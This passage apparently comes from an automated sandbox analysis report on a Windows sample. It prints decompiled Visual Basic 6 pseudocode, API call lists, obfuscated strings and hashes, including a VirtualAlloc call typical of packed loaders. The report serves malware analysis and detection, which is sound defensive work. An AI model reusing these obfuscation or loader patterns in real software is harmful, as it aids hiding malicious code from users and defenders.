__vbaHresultCheckObj.MSVBVM60(00000000,004014B8,00425BE4,000007CC), ref: 0042E48E
__vbaUI1I2.MSVBVM60(00000000,004014B8,00425BE4,000007CC), ref: 0042E4B2
__vbaUI1I2.MSVBVM60(?,00000000,?), ref: 0042E4CE
__vbaHresultCheckObj.MSVBVM60(00000000,004014B8,00425BE4,000007D0), ref: 0042E50D
__vbaFreeVar.MSVBVM60(0042E578), ref: 0042E572

Strings

rdsZNFSH6I4jVuhstcmQDXwblPfl8XwEZgi121, xrefs: 0042E3E5
N174, xrefs: 0042E1AB
gi1CWj9XV126, xrefs: 0042E33F
2/2, xrefs: 0042E216
nQQLCVlmU8OSQ6G5T8oOuo46, xrefs: 0042E3B3

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$CopyListMoveNew2$#545#568#608#666#672Chkstk
String ID: 2/2$N174$gi1CWj9XV126$nQQLCVlmU8OSQ6G5T8oOuo46$rdsZNFSH6I4jVuhstcmQDXwblPfl8XwEZgi121
API String ID: 64491242-3594050673
Opcode ID: 0f8718306e485a9b7677225b40a9c7b38d2c42edabad905ae3b8af6d2460ded1
Instruction ID: a1b9b85f09a6d5c56ed7afd1e973c115732b4c962421d33d746130812498ac21
Opcode Fuzzy Hash: 0f8718306e485a9b7677225b40a9c7b38d2c42edabad905ae3b8af6d2460ded1
Instruction Fuzzy Hash: 1FF10971E10228EFDB10EFA1DC45F9DBBB4BF08304F5080AAF549A61A1DB785A85CF59

Uniqueness

Uniqueness Score: 100.00%

Function 00422411, Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 293
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(B59E820E,723E0892,-55B191F4,46802C88), ref: 00422E55

Strings

fL(k, xrefs: 00422F02
Mvl:, xrefs: 00422C97
NB'L, xrefs: 004230F7
Pp/h, xrefs: 00422D5E
{%, xrefs: 00422780

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: Mvl:$NB'L$Pp/h$fL(k${%
API String ID: 4275171209-3251163765
Opcode ID: dbbb5cc503d28a828a89fab048813a4c9427d4fbd2c0acf7c6a10aace2d70d3f
Instruction ID: 944b4e5092d6f71731de60e34c59b789c41b66cc8cd2e1b7dc8068e1d1668c84
Opcode Fuzzy Hash: dbbb5cc503d28a828a89fab048813a4c9427d4fbd2c0acf7c6a10aace2d70d3f
Instruction Fuzzy Hash: EA81B29D700723A5BB20786D96F03EA10775FE47C4BEA853B8C869214CEFAAC4C79157

Uniqueness

Uniqueness Score: 100.00%

Non-executed Functions

Function 0042E597, Relevance: 75.6, APIs: 41, Strings: 2, Instructions: 337
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E0042E597(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v40;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				signed int _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				void* _v120;
				signed int _v124;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				char* _t142;
				signed int _t143;
				signed int _t149;
				signed int _t153;
				signed int _t161;
				signed int _t171;
				signed int _t177;
				signed int _t186;
				char* _t189;
				signed int* _t190;
				signed int _t193;
				char* _t205;
				intOrPtr _t224;
				intOrPtr* _t225;
				void* _t226;

				_push(0x401746);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t224;
				L00401740();
				_v12 = _t224;
				_v8 = 0x4014e0;
				_push( &_v88);
				L00401854();
				_t142 =  &_v88;
				_push(_t142);
				L0040185A();
				_v112 =  ~(0 | _t142 != 0x0000ffff);
				L0040186C();
				_t143 = _v112;
				if(_t143 != 0) {
					_push(0);
					_push(L"e1Yuy33");
					_push( &_v40);
					_push( &_v88);
					L0040184E();
					_t226 = _t224 + 0x10;
					if( *0x432400 != 0) {
						_v136 = 0x432400;
					} else {
						_push(0x432400);
						_push(0x4263e8);
						L004018B4();
						_v136 = 0x432400;
					}
					_v112 =  *_v136;
					_t186 =  *((intOrPtr*)( *_v112 + 0x1c))(_v112,  &_v68);
					asm("fclex");
					_v116 = _t186;
					if(_v116 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4263d8);
						_push(_v112);
						_push(_v116);
						L004018AE();
						_v140 = _t186;
					}
					_v120 = _v68;
					_v96 = 1;
					_v104 = 2;
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t189 =  &_v88;
					L00401848();
					_t190 =  &_v72;
					L0040189C();
					_t193 =  *((intOrPtr*)( *_v120 + 0x58))(_v120, _t190, _t190, _t189, _t189, 0x42650c, 0x10);
					asm("fclex");
					_v124 = _t193;
					if(_v124 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x4263f8);
						_push(_v120);
						_push(_v124);
						L004018AE();
						_v144 = _t193;
					}
					_push( &_v68);
					_t143 =  &_v72;
					_push(_t143);
					_push(2);
					L00401860();
					_t224 = _t226 + 0xc;
					L0040186C();
				}
				_push(0x426520);
				_push(0x426520);
				L00401842();
				if(_t143 != 0) {
					if( *0x432400 != 0) {
						_v148 = 0x432400;
					} else {
						_push(0x432400);
						_push(0x4263e8);
						L004018B4();
						_v148 = 0x432400;
					}
					_v112 =  *_v148;
					_t171 =  *((intOrPtr*)( *_v112 + 0x1c))(_v112,  &_v68);
					asm("fclex");
					_v116 = _t171;
					if(_v116 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4263d8);
						_push(_v112);
						_push(_v116);
						L004018AE();
						_v152 = _t171;
					}
					_v120 = _v68;
					_v96 = 0x80020004;
					_v104 = 0xa;
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t177 =  *((intOrPtr*)( *_v120 + 0x54))(_v120, 0x10,  &_v72);
					asm("fclex");
					_v124 = _t177;
					if(_v124 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x4263f8);
						_push(_v120);
						_push(_v124);
						L004018AE();
						_v156 = _t177;
					}
					_v132 = _v72;
					_v72 = _v72 & 0x00000000;
					_push(_v132);
					_t143 =  &_v56;
					_push(_t143);
					L0040183C();
					L004018A8();
				}
				_push(0x426528);
				_push(0x426530);
				L004018C0();
				L00401872();
				_push(_t143);
				L00401836();
				L00401872();
				_push(_t143);
				_push(0x426530);
				L00401842();
				asm("sbb eax, eax");
				_v112 =  ~( ~( ~_t143));
				_push( &_v64);
				_push( &_v60);
				_push(2);
				L00401830();
				_t225 = _t224 + 0xc;
				_t149 = _v112;
				if(_t149 != 0) {
					if( *0x432400 != 0) {
						_v160 = 0x432400;
					} else {
						_push(0x432400);
						_push(0x4263e8);
						L004018B4();
						_v160 = 0x432400;
					}
					_v112 =  *_v160;
					_t161 =  *((intOrPtr*)( *_v112 + 0x1c))(_v112,  &_v68);
					asm("fclex");
					_v116 = _t161;
					if(_v116 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4263d8);
						_push(_v112);
						_push(_v116);
						L004018AE();
						_v164 = _t161;
					}
					_v120 = _v68;
					_t149 =  *((intOrPtr*)( *_v120 + 0x64))(_v120, 1,  &_v108);
					asm("fclex");
					_v124 = _t149;
					if(_v124 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x4263f8);
						_push(_v120);
						_push(_v124);
						L004018AE();
						_v168 = _t149;
					}
					L004018A8();
				}
				_push(0x426538);
				_push(0x426544);
				L004018C0();
				L00401872();
				_push(2);
				_t121 =  &_v24; // 0x426544
				_push( *_t121);
				L0040182A();
				L00401872();
				_push(_t149);
				_push(0x426544);
				L00401842();
				asm("sbb eax, eax");
				_v112 =  ~( ~( ~_t149));
				_t205 =  &_v60;
				L004018D2();
				_t153 = _v112;
				if(_t153 != 0) {
					L00401824();
					 *_t225 =  *0x4014d4;
					_v104 =  *0x4014d0;
					_v108 =  *0x4014cc;
					_v112 =  *0x4014c8;
					_t153 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t205, _t205, _t205, _t205, _t153);
					asm("fclex");
					_v112 = _t153;
					if(_v112 >= 0) {
						_v172 = _v172 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x425bb4);
						_push(_a4);
						_push(_v112);
						L004018AE();
						_v172 = _t153;
					}
				}
				asm("wait");
				_push(0x42ea50);
				L004018D2();
				L0040186C();
				L0040186C();
				return _t153;
			}

0x0042e59c
0x0042e5a7
0x0042e5a8
0x0042e5b4
0x0042e5bc
0x0042e5bf
0x0042e5c9
0x0042e5ca
0x0042e5cf
0x0042e5d2
0x0042e5d3
0x0042e5e3
0x0042e5ea
0x0042e5ef
0x0042e5f5
0x0042e5fb
0x0042e5fd
0x0042e605
0x0042e609
0x0042e60a
0x0042e60f
0x0042e619
0x0042e636
0x0042e61b
0x0042e61b
0x0042e620
0x0042e625
0x0042e62a
0x0042e62a
0x0042e648
0x0042e657
0x0042e65a
0x0042e65c
0x0042e663
0x0042e67f
0x0042e665
0x0042e665
0x0042e667
0x0042e66c
0x0042e66f
0x0042e672
0x0042e677
0x0042e677
0x0042e689
0x0042e68c
0x0042e693
0x0042e69d
0x0042e6a7
0x0042e6a8
0x0042e6a9
0x0042e6aa
0x0042e6b0
0x0042e6b4
0x0042e6ba
0x0042e6be
0x0042e6cc
0x0042e6cf
0x0042e6d1
0x0042e6d8
0x0042e6f4
0x0042e6da
0x0042e6da
0x0042e6dc
0x0042e6e1
0x0042e6e4
0x0042e6e7
0x0042e6ec
0x0042e6ec
0x0042e6fe
0x0042e6ff
0x0042e702
0x0042e703
0x0042e705
0x0042e70a
0x0042e710
0x0042e710
0x0042e715
0x0042e71a
0x0042e71f
0x0042e726
0x0042e733
0x0042e750
0x0042e735
0x0042e735
0x0042e73a
0x0042e73f
0x0042e744
0x0042e744
0x0042e762
0x0042e771
0x0042e774
0x0042e776
0x0042e77d
0x0042e799
0x0042e77f
0x0042e77f
0x0042e781
0x0042e786
0x0042e789
0x0042e78c
0x0042e791
0x0042e791
0x0042e7a3
0x0042e7a6
0x0042e7ad
0x0042e7bb
0x0042e7c5
0x0042e7c6
0x0042e7c7
0x0042e7c8
0x0042e7d1
0x0042e7d4
0x0042e7d6
0x0042e7dd
0x0042e7f9
0x0042e7df
0x0042e7df
0x0042e7e1
0x0042e7e6
0x0042e7e9
0x0042e7ec
0x0042e7f1
0x0042e7f1
0x0042e803
0x0042e806
0x0042e80a
0x0042e80d
0x0042e810
0x0042e811
0x0042e819
0x0042e819
0x0042e81e
0x0042e823
0x0042e828
0x0042e832
0x0042e837
0x0042e838
0x0042e842
0x0042e847
0x0042e848
0x0042e84d
0x0042e854
0x0042e85a
0x0042e861
0x0042e865
0x0042e866
0x0042e868
0x0042e86d
0x0042e870
0x0042e876
0x0042e883
0x0042e8a0
0x0042e885
0x0042e885
0x0042e88a
0x0042e88f
0x0042e894
0x0042e894
0x0042e8b2
0x0042e8c1
0x0042e8c4
0x0042e8c6
0x0042e8cd
0x0042e8e9
0x0042e8cf
0x0042e8cf
0x0042e8d1
0x0042e8d6
0x0042e8d9
0x0042e8dc
0x0042e8e1
0x0042e8e1
0x0042e8f3
0x0042e904
0x0042e907
0x0042e909
0x0042e910
0x0042e92c
0x0042e912
0x0042e912
0x0042e914
0x0042e919
0x0042e91c
0x0042e91f
0x0042e924
0x0042e924
0x0042e936
0x0042e936
0x0042e93b
0x0042e940
0x0042e945
0x0042e94f
0x0042e954
0x0042e956
0x0042e956
0x0042e959
0x0042e963
0x0042e968
0x0042e969
0x0042e96e
0x0042e975
0x0042e97b
0x0042e97f
0x0042e982
0x0042e987
0x0042e98d
0x0042e995
0x0042e9a2
0x0042e9ac
0x0042e9b6
0x0042e9c0
0x0042e9cd
0x0042e9d3
0x0042e9d5
0x0042e9dc
0x0042e9fb
0x0042e9de
0x0042e9de
0x0042e9e3
0x0042e9e8
0x0042e9eb
0x0042e9ee
0x0042e9f3
0x0042e9f3
0x0042e9dc
0x0042ea02
0x0042ea03
0x0042ea3a
0x0042ea42
0x0042ea4a
0x0042ea4f

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042E5B4
#610.MSVBVM60(?,?,?,?,?,00401746), ref: 0042E5CA
#557.MSVBVM60(?,?,?,?,?,?,00401746), ref: 0042E5D3
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401746), ref: 0042E5EA
__vbaVarLateMemCallLd.MSVBVM60(?,?,e1Yuy33,00000000,?,?,?,?,?,?,00401746), ref: 0042E60A
__vbaNew2.MSVBVM60(004263E8,00432400), ref: 0042E625
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263D8,0000001C), ref: 0042E672
__vbaChkstk.MSVBVM60(00000000,?,004263D8,0000001C), ref: 0042E69D
__vbaCastObjVar.MSVBVM60(?,0042650C), ref: 0042E6B4
__vbaObjSet.MSVBVM60(?,00000000,?,0042650C), ref: 0042E6BE
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263F8,00000058), ref: 0042E6E7
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0042E705
__vbaFreeVar.MSVBVM60 ref: 0042E710
__vbaStrCmp.MSVBVM60(00426520,00426520,?,?,?,?,?,?,00401746), ref: 0042E71F
__vbaNew2.MSVBVM60(004263E8,00432400,00426520,00426520,?,?,?,?,?,?,00401746), ref: 0042E73F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263D8,0000001C), ref: 0042E78C
__vbaChkstk.MSVBVM60(?), ref: 0042E7BB
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263F8,00000054), ref: 0042E7EC
__vbaVarSetObj.MSVBVM60(?,?), ref: 0042E811
__vbaFreeObj.MSVBVM60(?,?), ref: 0042E819
__vbaStrCat.MSVBVM60(00426530,00426528,00426520,00426520,?,?,?,?,?,?,00401746), ref: 0042E828
__vbaStrMove.MSVBVM60(00426530,00426528,00426520,00426520,?,?,?,?,?,?,00401746), ref: 0042E832
#521.MSVBVM60(00000000,00426530,00426528,00426520,00426520,?,?,?,?,?,?,00401746), ref: 0042E838
__vbaStrMove.MSVBVM60(00000000,00426530,00426528,00426520,00426520,?,?,?,?,?,?,00401746), ref: 0042E842
__vbaStrCmp.MSVBVM60(00426530,00000000,00000000,00426530,00426528,00426520,00426520,?,?,?,?,?,?,00401746), ref: 0042E84D
__vbaFreeStrList.MSVBVM60(00000002,?,?,00426530,00000000,00000000,00426530,00426528,00426520,00426520,?,?), ref: 0042E868
__vbaNew2.MSVBVM60(004263E8,00432400), ref: 0042E88F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263D8,0000001C), ref: 0042E8DC
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263F8,00000064), ref: 0042E91F
__vbaFreeObj.MSVBVM60(00000000,?,004263F8,00000064), ref: 0042E936
__vbaStrCat.MSVBVM60(00426544,00426538), ref: 0042E945
__vbaStrMove.MSVBVM60(00426544,00426538), ref: 0042E94F
#514.MSVBVM60(DeB8eB,00000002,00426544,00426538), ref: 0042E959
__vbaStrMove.MSVBVM60(DeB8eB,00000002,00426544,00426538), ref: 0042E963
__vbaStrCmp.MSVBVM60(00426544,00000000,DeB8eB,00000002,00426544,00426538), ref: 0042E96E
__vbaFreeStr.MSVBVM60(00426544,00000000,DeB8eB,00000002,00426544,00426538), ref: 0042E982
__vbaFpI4.MSVBVM60(00426544,00000000,DeB8eB,00000002,00426544,00426538), ref: 0042E995
__vbaHresultCheckObj.MSVBVM60(00000000,?,00425BB4,000002C8), ref: 0042E9EE
__vbaFreeStr.MSVBVM60(0042EA50,00426544,00000000,DeB8eB,00000002,00426544,00426538), ref: 0042EA3A
__vbaFreeVar.MSVBVM60(0042EA50,00426544,00000000,DeB8eB,00000002,00426544,00426538), ref: 0042EA42
__vbaFreeVar.MSVBVM60(0042EA50,00426544,00000000,DeB8eB,00000002,00426544,00426538), ref: 0042EA4A

Strings

DeB8eB, xrefs: 0042E94C, 0042E956
e1Yuy33, xrefs: 0042E5FD

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$Move$ChkstkNew2$List$#514#521#557#610CallCastLate
String ID: DeB8eB$e1Yuy33
API String ID: 3538955399-29654760
Opcode ID: 40265df0b4f731b3898115cbc58dd6a9aec468e1426a3d3737635f8677dbcf21
Instruction ID: 33da87c6c00cb3ba0b3a12e9b6c854ab9786a6c1797f9300670d5524113f3fae
Opcode Fuzzy Hash: 40265df0b4f731b3898115cbc58dd6a9aec468e1426a3d3737635f8677dbcf21
Instruction Fuzzy Hash: 59D13B71E00228EFDB10EFA2D846B9DB7B4BF14704F60806AF505BB1A2DB785A45DF18

Uniqueness

Uniqueness Score: 100.00%

Function 0042ECDD, Relevance: 54.5, APIs: 28, Strings: 3, Instructions: 265
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E0042ECDD(void* __ebx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				char _v44;
				signed int _v52;
				char _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				char* _v116;
				char _v124;
				char* _v132;
				char _v140;
				char* _v148;
				intOrPtr _v156;
				intOrPtr _v164;
				intOrPtr _v172;
				intOrPtr _v180;
				char _v188;
				signed int _v208;
				signed int _v212;
				intOrPtr* _v224;
				signed int _v228;
				signed int _v232;
				signed int _t109;
				char* _t113;
				signed int _t114;
				signed int _t119;
				char* _t123;
				signed int _t142;
				void* _t172;
				void* _t174;
				intOrPtr _t175;

				_t175 = _t174 - 0xc;
				 *[fs:0x0] = _t175;
				L00401740();
				_v16 = _t175;
				_v12 = 0x401508;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401746, _t172);
				L00401812();
				_v52 = 9;
				_v60 = 2;
				_push( &_v60);
				_push( &_v76);
				L0040180C();
				_v132 = 0xb;
				_v140 = 0x8002;
				_push( &_v76);
				_t109 =  &_v140;
				_push(_t109);
				L00401896();
				_v208 = _t109;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L004018BA();
				if(_v208 != 0) {
					if( *0x432400 != 0) {
						_v224 = 0x432400;
					} else {
						_push(0x432400);
						_push(0x4263e8);
						L004018B4();
						_v224 = 0x432400;
					}
					_v208 =  *_v224;
					_v180 = 0x748748;
					_v188 = 3;
					_v164 = 0x6c9a38;
					_v172 = 3;
					_v148 = 0x18;
					_v156 = 2;
					_v132 = 0x75c620;
					_v140 = 3;
					_v116 = L"pPok25q239";
					_v124 = 8;
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t142 =  *((intOrPtr*)( *_v208 + 0x44))(_v208, 0x10, 0x10, 0x10, 0x10, 0x10,  &_v44);
					asm("fclex");
					_v212 = _t142;
					if(_v212 >= 0) {
						_v228 = _v228 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x4263d8);
						_push(_v208);
						_push(_v212);
						L004018AE();
						_v228 = _t142;
					}
					L004018A8();
				}
				_v60 = 1;
				_t113 =  &_v60;
				_push(_t113);
				L00401806();
				_v208 =  ~(0 | _t113 != 0x0000ffff);
				L0040186C();
				_t114 = _v208;
				if(_t114 != 0) {
					_v132 = 0x80020004;
					_v140 = 0xa;
					_v116 = 0x80020004;
					_v124 = 0xa;
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t114 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10);
					asm("fclex");
					_v208 = _t114;
					if(_v208 >= 0) {
						_v232 = _v232 & 0x00000000;
					} else {
						_push(0x2b0);
						_push(0x425bb4);
						_push(_a4);
						_push(_v208);
						L004018AE();
						_v232 = _t114;
					}
				}
				_v68 = 1;
				_v76 = 2;
				_push(0x426578);
				_push(0x426580);
				L004018C0();
				_v52 = _t114;
				_v60 = 8;
				_push( &_v76);
				_push(2);
				_push( &_v60);
				_push( &_v92);
				L00401800();
				_v132 = 0x426580;
				_v140 = 0x8008;
				_push( &_v92);
				_t119 =  &_v140;
				_push(_t119);
				L00401896();
				_v208 = _t119;
				_push( &_v92);
				_push( &_v76);
				_push( &_v60);
				_push(3);
				L004018BA();
				_t123 = _v208;
				if(_t123 != 0) {
					_v116 = _a4;
					_v124 = 9;
					_v148 = L"C6h1uLOa1omsDqXOis7P6KpL3QrV353";
					_v156 = 8;
					_v180 = 0x59a8d;
					_v188 = 3;
					_push(0x10);
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401740();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"YBTmaBsg0IpQ8WhRor9qy2");
					_t123 =  &_v40;
					_push(_t123);
					L004017F4();
					_push(_t123);
					L004017FA();
				}
				_push(0x42f0d9);
				L0040186C();
				return _t123;
			}

0x0042ece0
0x0042ecef
0x0042ecfb
0x0042ed03
0x0042ed06
0x0042ed0d
0x0042ed1c
0x0042ed1f
0x0042ed24
0x0042ed2b
0x0042ed35
0x0042ed39
0x0042ed3a
0x0042ed3f
0x0042ed46
0x0042ed53
0x0042ed54
0x0042ed5a
0x0042ed5b
0x0042ed60
0x0042ed6a
0x0042ed6e
0x0042ed6f
0x0042ed71
0x0042ed82
0x0042ed8f
0x0042edac
0x0042ed91
0x0042ed91
0x0042ed96
0x0042ed9b
0x0042eda0
0x0042eda0
0x0042edbe
0x0042edc4
0x0042edce
0x0042edd8
0x0042ede2
0x0042edec
0x0042edf6
0x0042ee00
0x0042ee07
0x0042ee11
0x0042ee18
0x0042ee26
0x0042ee33
0x0042ee34
0x0042ee35
0x0042ee36
0x0042ee3a
0x0042ee47
0x0042ee48
0x0042ee49
0x0042ee4a
0x0042ee4e
0x0042ee5b
0x0042ee5c
0x0042ee5d
0x0042ee5e
0x0042ee62
0x0042ee6f
0x0042ee70
0x0042ee71
0x0042ee72
0x0042ee76
0x0042ee80
0x0042ee81
0x0042ee82
0x0042ee83
0x0042ee92
0x0042ee95
0x0042ee97
0x0042eea4
0x0042eec6
0x0042eea6
0x0042eea6
0x0042eea8
0x0042eead
0x0042eeb3
0x0042eeb9
0x0042eebe
0x0042eebe
0x0042eed0
0x0042eed0
0x0042eed5
0x0042eedc
0x0042eedf
0x0042eee0
0x0042eef0
0x0042eefa
0x0042eeff
0x0042ef08
0x0042ef0e
0x0042ef15
0x0042ef1f
0x0042ef26
0x0042ef30
0x0042ef3d
0x0042ef3e
0x0042ef3f
0x0042ef40
0x0042ef44
0x0042ef4e
0x0042ef4f
0x0042ef50
0x0042ef51
0x0042ef5a
0x0042ef60
0x0042ef62
0x0042ef6f
0x0042ef91
0x0042ef71
0x0042ef71
0x0042ef76
0x0042ef7b
0x0042ef7e
0x0042ef84
0x0042ef89
0x0042ef89
0x0042ef6f
0x0042ef98
0x0042ef9f
0x0042efa6
0x0042efab
0x0042efb0
0x0042efb5
0x0042efb8
0x0042efc2
0x0042efc3
0x0042efc8
0x0042efcc
0x0042efcd
0x0042efd2
0x0042efd9
0x0042efe6
0x0042efe7
0x0042efed
0x0042efee
0x0042eff3
0x0042effd
0x0042f001
0x0042f005
0x0042f006
0x0042f008
0x0042f010
0x0042f019
0x0042f022
0x0042f025
0x0042f02c
0x0042f036
0x0042f040
0x0042f04a
0x0042f054
0x0042f057
0x0042f061
0x0042f062
0x0042f063
0x0042f064
0x0042f065
0x0042f068
0x0042f075
0x0042f076
0x0042f077
0x0042f078
0x0042f079
0x0042f07c
0x0042f089
0x0042f08a
0x0042f08b
0x0042f08c
0x0042f08d
0x0042f08f
0x0042f094
0x0042f097
0x0042f098
0x0042f09d
0x0042f09e
0x0042f0a3
0x0042f0a6
0x0042f0d3
0x0042f0d8

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042ECFB
#534.MSVBVM60(?,?,?,?,00401746), ref: 0042ED1F
#575.MSVBVM60(?,00000002), ref: 0042ED3A
__vbaVarTstNe.MSVBVM60(00008002,?), ref: 0042ED5B
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?), ref: 0042ED71
__vbaNew2.MSVBVM60(004263E8,00432400,?,?,00401746), ref: 0042ED9B
__vbaChkstk.MSVBVM60(?), ref: 0042EE26
__vbaChkstk.MSVBVM60(?), ref: 0042EE3A
__vbaChkstk.MSVBVM60(?), ref: 0042EE4E
__vbaChkstk.MSVBVM60(?), ref: 0042EE62
__vbaChkstk.MSVBVM60(?), ref: 0042EE76
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263D8,00000044), ref: 0042EEB9
__vbaFreeObj.MSVBVM60(00000000,?,004263D8,00000044), ref: 0042EED0
#560.MSVBVM60(00000001), ref: 0042EEE0
__vbaFreeVar.MSVBVM60(00000001), ref: 0042EEFA
__vbaChkstk.MSVBVM60(00000001), ref: 0042EF30
__vbaChkstk.MSVBVM60(00000001), ref: 0042EF44
__vbaHresultCheckObj.MSVBVM60(00000000,00401508,00425BB4,000002B0), ref: 0042EF84
__vbaStrCat.MSVBVM60(00426580,00426578,?,?,?,00000001), ref: 0042EFB0
#632.MSVBVM60(?,00000008,00000002,00000002,00426580,00426578,?,?,?,00000001), ref: 0042EFCD
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,00000008,00000002,00000002), ref: 0042EFEE
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 0042F008
__vbaChkstk.MSVBVM60 ref: 0042F057
__vbaChkstk.MSVBVM60 ref: 0042F068
__vbaChkstk.MSVBVM60 ref: 0042F07C
__vbaObjVar.MSVBVM60(?,YBTmaBsg0IpQ8WhRor9qy2,00000003), ref: 0042F098
__vbaLateMemCall.MSVBVM60(00000000,?,YBTmaBsg0IpQ8WhRor9qy2,00000003), ref: 0042F09E
__vbaFreeVar.MSVBVM60(0042F0D9,?,?,?,?,?,?,00401746), ref: 0042F0D3

Strings

pPok25q239, xrefs: 0042EE11
C6h1uLOa1omsDqXOis7P6KpL3QrV353, xrefs: 0042F02C
YBTmaBsg0IpQ8WhRor9qy2, xrefs: 0042F08F

Memory Dump Source

Source File: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: __vba$Chkstk$Free$CheckHresultList$#534#560#575#632CallLateNew2
String ID: C6h1uLOa1omsDqXOis7P6KpL3QrV353$YBTmaBsg0IpQ8WhRor9qy2$pPok25q239
API String ID: 2276745288-4063545305
Opcode ID: e922b65aec5b82ea8845fe568e467f6f52b8d47de3e9d2f398b3647c3c4acee6
